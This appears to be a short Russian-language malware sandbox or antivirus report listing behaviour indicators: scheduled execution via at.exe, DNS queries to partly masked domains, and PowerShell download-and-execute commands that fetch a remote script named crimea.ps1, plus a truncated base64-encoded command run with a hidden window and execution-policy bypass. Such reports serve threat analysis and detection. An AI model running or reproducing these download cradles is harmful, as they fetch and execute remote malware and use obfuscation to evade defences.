Техническая информация
- '<SYSTEM32>\at.exe' line:1 char:392
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (New-Object('Net.WebClient')).'DoWnloadsTrInG'('http://of#####services-sec.com/crimea.ps1')
- <SYSTEM32>\windowspowershell\v1.0\powershell.exe
- http://of#####services-sec.com/crimea.ps1
- http://pa##e.ee/r/5q92D
- DNS ASK of#####services-sec.com
- DNS ASK pa##e.ee
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (New-Object('Net.WebClient')).'DoWnloadsTrInG'('http://of#####services-sec.com/crimea.ps1')' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -w 1 /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZ...